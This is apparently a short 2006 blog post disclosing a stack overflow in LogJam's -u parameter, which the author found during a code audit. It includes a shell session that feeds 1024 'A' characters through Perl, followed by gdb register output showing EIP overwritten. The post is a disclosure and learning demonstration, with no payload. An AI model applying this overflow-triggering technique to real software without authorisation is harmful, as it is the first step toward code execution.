2006-03-04 20:36:00
By Tim Brown
More bugs discovered during a code audits... for example I discovered that the -u parameter to LogJam was subject to a stack overflow attack. It's purely hypothetical since you'd only exploit yourself, but probably fun to play with whilst learning more about how such attacks work.
user@host:~$ ulimit -c 100000 user@host:~$ logjam -u `perl -e "print 'A'x1024"` Password: Segmentation fault (core dumped) user@host:~$ gdb logjam core ... #0 0x41414141 in ?? () (gdb) info registers eax 0x0 0 ecx 0xb76f5ff4 -1217437708 edx 0xbf9e2f9c -1080152164 ebx 0x41414141 1094795585 esp 0xbf9e3080 0xbf9e3080 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x80dc118 135119128 eip 0x41414141 0x41414141 eflags 0x10286 66182 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0xc010007b -1072693125 fs 0x0 0 gs 0x33 51
As you can see, EIP is clearly overwritten.
Update: This issue evoked lively debate over on LiveJournal.
Mood: random()
Music: Nothing playing right now
You are unknown, comment